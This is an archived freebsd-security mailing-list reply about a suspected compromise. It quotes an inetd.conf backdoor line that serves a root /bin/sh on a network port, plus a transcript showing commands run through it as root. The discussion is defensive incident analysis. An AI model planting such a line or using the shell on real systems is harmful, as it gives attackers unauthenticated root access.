On Thu, 1 Nov 2001, Ralph Huntington wrote:

> I have that sinking feeling. I discovered this line at the end of
> inetd.conf on one of our servers:
>
> dlip stream tcp nowait root /bin/sh sh -i
>
> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
> provides what *looks* like a root shell, but I don't seem to be able to do
> anything with it. Pretty mysterious.
>
> Can anyone offer a clue? Thanks in advance, Ralph
I've reproduced this on my machine. Yes, this is a functional rootshell
albeit in a little strange manner...

After telnetting to port 7201:
# touch /tmp/xxx ;
: not found
# ls -l /tmp ;
total 5
-rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.145a7d
-rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.366cf
drwxr-xr-x 2 root wheel 512 Oct 7 22:08 install.554
drwxr-xr-x 2 root wheel 512 Oct 14 08:39 install.92650
srwxrwxrwx 1 mysql wheel 0 Nov 1 15:49 mysql.sock
drwx------ 2 kzaraska wheel 512 Sep 5 15:40 ntVQm8
-rw-r--r-- 1 root wheel 0 Aug 12 11:41 test
-rw-r--r-- 1 root wheel 0 Nov 1 15:59 xxx
: not found
# id ;
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator),
20(staff), 31(guest)
#

etc. ls itself does not seem to work, but ls -l ; does and so on... Guess
you'll have experiment a little. Anyhow, this definitely is a backdoor.

Krzysztof

To Unsubscribe: send mail to majordomoFreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]